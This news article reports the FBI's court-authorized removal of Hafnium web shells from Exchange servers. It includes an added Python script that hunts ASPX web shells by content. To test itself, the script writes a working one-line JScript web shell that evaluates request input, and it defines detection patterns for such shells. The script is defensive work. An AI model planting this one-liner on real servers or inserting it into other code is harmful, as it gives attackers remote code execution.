Weeks after Hafnium – a China-based hacking group – exploited four previously unknown (zero-day) vulnerabilities in on-premises Microsoft Exchange Server, a federal court in Houston authorized an FBI operation to “copy and remove” the web shells the intruders had left on affected servers. According to the announcement the Justice Department made on April 13, the operation was successful.
In early March, Microsoft disclosed that Hafnium had broken into Exchange servers, stolen mailbox contents, and left web shells behind. Other hacking groups then went after the same vulnerable servers, and some of them deployed ransomware in the process.
Microsoft warned that attackers were exploiting the zero-day vulnerabilities and named Hafnium as the primary actor. Microsoft said the group tried to steal information from US defense contractors, policy think tanks, infectious disease researchers, and law firms, among other organizations that run on-premises Microsoft Exchange Server for enterprise email. The company released out-of-band security updates on March 2 and urged customers to apply them immediately.
Microsoft’s Vice President of Customer Security & Trust, Tom Burt, said, “Even though we’ve worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.”
The operation removed web shells from hundreds of servers, but it did not patch the underlying Exchange vulnerabilities or remove any other malware the intruders may have left behind, so servers whose owners have not applied Microsoft’s updates remain exposed to further attacks. The Justice Department explained why a court-authorized removal was warranted: each remaining web shell had its own unique file path and name, which made it harder for individual server owners to find and delete them. It described the mechanism narrowly: “The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path).”
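The removal quoted above worked because the FBI already knew each shell’s unique path. A defender hunting on their own server does not, so the useful check is content-based: walk the Exchange web directories and flag any server-side script that behaves like a shell, regardless of its name. The following is an added example for this article, not code from the page, Microsoft, CISA or the FBI. The directory list mirrors locations Microsoft named publicly in its March 2021 guidance; the content patterns, the `hunt_web_shells` function and the sample files are assumptions constructed here, not an official signature set.

```python
"""Content-based hunt for dropped ASPX web shells in Exchange web directories.

Added example for this article; it is not code from the page, Microsoft,
CISA or the FBI. The subdirectory list mirrors locations Microsoft named
publicly in March 2021, the content patterns are an assumption of this
example (not an official signature set), and the sample files are constructed.
"""
import hashlib
import os
import re
import tempfile

# Subdirectories, relative to the scan root, where dropped web shells were
# commonly found (assumption: the Exchange V15 tree and the IIS web root are
# both placed under the same scan root for this example).
SUSPECT_SUBDIRS = [
    os.path.join("FrontEnd", "HttpProxy", "owa", "auth"),
    os.path.join("FrontEnd", "HttpProxy", "ecp", "auth"),
    os.path.join("inetpub", "wwwroot", "aspnet_client"),
]

# Indicators typical of one-line ASPX web shells. Any one hit is worth a
# look; several together almost always mean a shell.
SHELL_PATTERNS = {
    "eval_of_request": re.compile(r"eval\s*\(\s*Request", re.IGNORECASE),
    "jscript_page": re.compile(r'Language\s*=\s*"?JScript', re.IGNORECASE),
    "unsafe_eval_flag": re.compile(r'"unsafe"', re.IGNORECASE),
    "process_spawn": re.compile(r"System\.Diagnostics\.Process", re.IGNORECASE),
}

SCRIPT_EXTENSIONS = (".aspx", ".ashx", ".asmx")


def score_file(path):
    """Return (score, matched pattern names, sha256) for one server-side script."""
    with open(path, "rb") as fh:
        data = fh.read()
    text = data.decode("utf-8", errors="replace")
    hits = [name for name, rx in SHELL_PATTERNS.items() if rx.search(text)]
    return len(hits), hits, hashlib.sha256(data).hexdigest()


def hunt_web_shells(root, min_score=1):
    """Walk the suspect subdirectories under root and return findings, highest
    score first. Files are judged by content, never by name, because each
    dropped shell carried its own unique file name and path."""
    findings = []
    for sub in SUSPECT_SUBDIRS:
        base = os.path.join(root, sub)
        if not os.path.isdir(base):
            continue
        for dirpath, _dirs, files in os.walk(base):
            for name in files:
                if not name.lower().endswith(SCRIPT_EXTENSIONS):
                    continue
                full = os.path.join(dirpath, name)
                score, hits, digest = score_file(full)
                if score >= min_score:
                    findings.append({
                        "path": os.path.relpath(full, root),
                        "score": score,
                        "hits": hits,
                        "sha256": digest,
                    })
    findings.sort(key=lambda f: (-f["score"], f["path"]))
    return findings


def build_sample_tree(root):
    """Populate root with constructed files: a benign logon page, a benign
    static asset, and one file modelled on a one-line ASPX shell."""
    owa_auth = os.path.join(root, "FrontEnd", "HttpProxy", "owa", "auth")
    client = os.path.join(root, "inetpub", "wwwroot", "aspnet_client")
    os.makedirs(owa_auth, exist_ok=True)
    os.makedirs(client, exist_ok=True)
    with open(os.path.join(owa_auth, "logon.aspx"), "w") as fh:
        fh.write('<%@ Page Language="C#" AutoEventWireup="true" %>\n'
                 '<html><body><form method="post">'
                 '<input name="username"/><input name="password" type="password"/>'
                 '</form></body></html>\n')
    with open(os.path.join(client, "static.js"), "w") as fh:
        fh.write("// constructed static asset, not a server-side script\n")
    # Constructed shell: an arbitrary unique name and a one-line JScript page
    # that evaluates whatever arrives in the request.
    with open(os.path.join(owa_auth, "supp0rt.aspx"), "w") as fh:
        fh.write('<%@ Page Language="Jscript"%>'
                 '<%eval(Request.Item["orange"],"unsafe");%>\n')


def demo():
    """Build the sample tree in a temporary directory and hunt it."""
    root = tempfile.mkdtemp(prefix="exchange-hunt-")
    build_sample_tree(root)
    return hunt_web_shells(root)


if __name__ == "__main__":
    for finding in demo():
        print(f'{finding["score"]}  {finding["path"]}  {", ".join(finding["hits"])}')
        print(f'    sha256={finding["sha256"]}')
```

On a real server, point `hunt_web_shells` at the Exchange install directory and the IIS web root separately rather than at a combined tree, and record the SHA-256 of anything flagged before deleting it: the hash is what you share with an incident responder, and the file itself is evidence of how the intruder got in.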
This is reportedly the first time the FBI has, under a court order, remotely removed malicious code from privately owned computers without first notifying their owners. John C. Demers, the Assistant Attorney General for the National Security Division, said this operation “demonstrates the Department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions.”
Throughout March, Microsoft released the information, patches, and detection tools needed to find and clean up compromised servers. In parallel, the FBI and the Cybersecurity & Infrastructure Security Agency (CISA) published a joint advisory, Compromise of Microsoft Exchange Server, with indicators of compromise and mitigation guidance. The FBI is now attempting to notify the owners of the servers it cleaned by email.